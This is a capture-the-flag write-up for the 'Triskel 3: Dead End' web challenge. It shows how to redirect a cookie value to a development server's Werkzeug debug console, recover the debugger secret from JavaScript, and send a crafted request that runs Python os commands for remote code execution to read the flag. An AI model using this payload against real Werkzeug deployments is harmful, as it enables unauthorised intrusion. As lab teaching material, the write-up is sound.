# Triskel 3: Dead End

## Problem

You are admin now\... Anyway now you can't access any information or have more privileges so I guess it's the end of your journey haha!

by Remsio

## Solution

We can now see that in the cookies, we have a value for `confidential_documents`, which seems like another "API call".

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-6c4432837f7e2e8b477edfc6290cc00cdfbd9b68%2Fa33e065763d148fb9c505e2cf70655d2.png?alt=media)

We are told that the API is powered by Werkzeug, which includes a debugging console at `/console` if debugging is enabled.

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-0f61ff65e1278734a1c917e47c7e10d1560c9d50%2F673321c7e0ef47eebacbbb0befcd6f08.png?alt=media)

The current cookie is set to the production server. If debugging is enabled, it would probably be at the development server.

If we go over to `confidential_documents=kontammadur_klanvour.dev.local%3A5001%2Fconsole`, we can see that there is a Werkzeug console.

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-40ca3b9fdc967e465818030953d167198e2024de%2F2c50d3d872014ef19e25c0322a7e4845.png?alt=media)

The secret key for the debugger is hardcoded in the JavaScript.

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-4ec68a0c1d179c5022f2fa321f8b4bff49ad7ca8%2Faf3f82f79f20471c82e3f087dfa36b72.png?alt=media)

Hence, we can craft a request as follows to achieve RCE.

`confidential_documents=kontammadur_klanvour.dev.local%3A5001%2Fconsole?__debugger__=yes&cmd=__import__('os').listdir('/')%3b&frm=0&s=IUrsy36AKlZ2zvT1vaPc`

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-f0a60214d536bfd0d390f9710d7542613b16755d%2F9c6ad07cf8f94dfcb3497ecf292be7d7.png?alt=media)

We find `flag.txt` in the `/` directory, so we can simply send another request to read the flag.

References:

* <https://www.netscylla.com/blog/2018/10/03/werkzeug-debugger.html>